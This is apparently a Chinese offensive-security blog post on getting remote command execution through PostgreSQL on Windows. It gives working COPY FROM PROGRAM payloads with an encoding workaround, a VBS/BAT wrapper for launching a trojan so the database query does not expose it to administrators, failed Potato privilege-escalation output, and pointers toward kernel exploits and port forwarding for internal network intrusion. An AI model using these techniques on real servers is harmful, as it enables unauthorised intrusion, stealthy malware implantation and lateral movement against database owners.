postgresql在windwos下rce的文章基本没有,先知上有一篇(链接打不开了,应该是这篇https://xz.aliyun.com/t/10202),感觉作者可能写的比较着急,所以存在很多问题,以下文章是踩坑之后的一些解决方法,前提是可堆叠注入或者可连接到数据库
如上面提到的文章作者所说,Windows下直接执行系统命令会报错
DROP TABLE IF EXISTS dd;
CREATE TABLE dd(dd text);
COPY dd FROM PROGRAM 'whoami /all';
SELECT \* FROM dd;
时间: 0.001s
CREATE TABLE dd(dd text)
OK
时间: 0.002s
COPY dd FROM PROGRAM 'whoami /all'
错误: 无效的 "UTF8" 编码字节顺序: 0xd3 0xc3
CONTEXT: COPY dd, 行 2
时间: 0.025s
去官网查了下copy命令的文档
COPY table\_name \[ ( column\_name \[, ...\] ) \]
FROM { 'filename' | PROGRAM 'command' | STDIN }
\[ \[ WITH \] ( option \[, ...\] ) \]
\[ WHERE condition \]
COPY { table\_name \[ ( column\_name \[, ...\] ) \] | ( query ) }
TO { 'filename' | PROGRAM 'command' | STDOUT }
\[ \[ WITH \] ( option \[, ...\] ) \]
where option can be one of:
FORMAT format\_name
FREEZE \[ boolean \]
DELIMITER 'delimiter\_character'
NULL 'null\_string'
HEADER \[ boolean | MATCH \]
QUOTE 'quote\_character'
ESCAPE 'escape\_character'
FORCE\_QUOTE { ( column\_name \[, ...\] ) | \* }
FORCE\_NOT\_NULL ( column\_name \[, ...\] )
FORCE\_NULL ( column\_name \[, ...\] )
ENCODING 'encoding\_name'
这不是有encoding嘛。。。。,后面加上**with encoding 'ISO-8859-1';**就好了,中文系统命令回显会有乱码,不过不影响信息收集
DROP TABLE IF EXISTS dd;
CREATE TABLE dd(dd text);
COPY dd FROM PROGRAM 'net view' with encoding 'ISO-8859-1';
SELECT \* FROM dd;
按照文中的方法通过命令直接上线的木马,会在木马在线的过程中一直保持着数据库查询的状态,没有ending,除非把马直接断掉,不然对方通过select * from pg_stat_activity;直接就可以在数据库查询进程里明晃晃的看到一个超长时数据库查询进程还有你马的磁盘位置。。。。。。。。,而且最关键的是这个进程除非通过任务管理器或者是服务端主动关闭session,否则不管是执行taskkill还是pg数据库的select pg_terminate_backend(pid);都无法关掉这个进程
用一个vbs脚本去调bat脚本,在bat脚本里再去调用马和结束任务
vbs脚本
set ws\=WScript.CreateObject("WScript.Shell")
ws.Run "test.bat",0
bat脚本
@echo off
start 1.exe
exit
首先我们看下"whoami /all",忽视乱码QAQ
Óû§ÐÅÏ¢
\----------------
̞ SID
\============================ ========
nt authority
network service S-1-5-20
×éÐÅÏ¢
\-----------------
×éÃû ÀàÐÍ SID ÊôÐÔ
\========================================== ====== ============ ==============================
Mandatory LabelSystem Mandatory Level ±êÇ© S-1-16-16384
Everyone ÒÑÖª×é S-1-1-0 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
BUILTINPre-Windows 2000 Compatible Access ±ðÃû S-1-5-32-554 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
BUILTINUsers ±ðÃû S-1-5-32-545 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
NT AUTHORITYSERVICE ÒÑÖª×é S-1-5-6 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
CONSOLE LOGON ÒÑÖª×é S-1-2-1 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
NT AUTHORITYAuthenticated Users ÒÑÖª×é S-1-5-11 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
NT AUTHORITYThis Organization ÒÑÖª×é S-1-5-15 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
LOCAL ÒÑÖª×é S-1-2-0 ±ØÐèµÄ×é, ÆôÓÃÓÚĬÈÏ, ÆôÓõÄ×é
ÌØȨÐÅÏ¢
\----------------------
ÌØȨÃû ÃèÊö ״̬
\======================= ============ ======
SeChangeNotifyPrivilege Èƹý±éÀú¼ì²é ÒÑÆôÓÃ
Óû§ÉùÃ÷ÐÅÏ¢
\-----------------------
Óû§ÉùÃ÷δ֪¡£
ÒÑÔÚ´ËÉ豸ÉϽûÓöԶ¯Ì¬·ÃÎÊ¿ØÖÆµÄ Kerberos Ö§³Ö¡£
在windows下默认安装的pgsql数据库的权限是network service,且没有SeImpersonate或者SeAssignPrimaryToken权限,所以potato家族的提权方法全部都无法利用,都会死在获取token或利用token鉴权这一步,报错如下
\[\*\]
\_\_\_\_ \_\_\_\_\_\_ \_\_ \_\_
/ \_\_ )\_\_\_\_ \_\_\_\_\_/ / \_\_ \\\_\_\_\_ / /\_\_\_\_\_ \_/ /\_\_\_\_\_
/ \_\_ / \_\_ \`/ \_\_ / /\_/ / \_\_ \\/ \_\_/ \_\_ \`/ \_\_/ \_\_ \\
/ /\_/ / /\_/ / /\_/ / \_\_\_\_/ /\_/ / /\_/ /\_/ / /\_/ /\_/ /
/\_\_\_\_\_/\\\_\_,\_/\\\_\_,\_/\_/ \\\_\_\_\_/\\\_\_/\\\_\_,\_/\\\_\_/\\\_\_\_\_/
Github:https://github.com/BeichenDream/BadPotato/ By:BeichenDream
\[\*\] PipeName : \\\\.\\pipe\\f9117ffe84ee4b8b99449dc28eedb31d\\pipe\\spoolss
\[\*\] ConnectPipeName : \\\\WIN-8HVRNH9E3VV/pipe/f9117ffe84ee4b8b99449dc28eedb31d
\[\*\] CreateNamedPipeW Success! IntPtr:712
\[\*\] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:3029823515808
\[\*\] ConnectNamePipe Success!
\[\*\] CurrentUserName : WIN-8HVRNH9E3VV$
\[\*\] CurrentConnectPipeUserName :
\[\*\] ImpersonateNamedPipeClient Success!
\[\*\] OpenThreadToken Success! IntPtr:1016
Unknown error (0x542)
\[!\] DuplicateTokenEx fail!
JuicyPotatoNG
by decoder\_it & splinter\_code
\[\*\] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
\[+\] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\\SYSTEM;Impersonation
\[!\] Current process doesn't have SeImpersonate or SeAssignPrimaryToken privileges, exiting...
老老实实根据kb找内核提权cve.。。。允悲
没有合适的cve的话弹回来的权限非常低(计算机名+$),除了查看一些文件,只能做低权限口子去端口转发去进一步做内网渗透。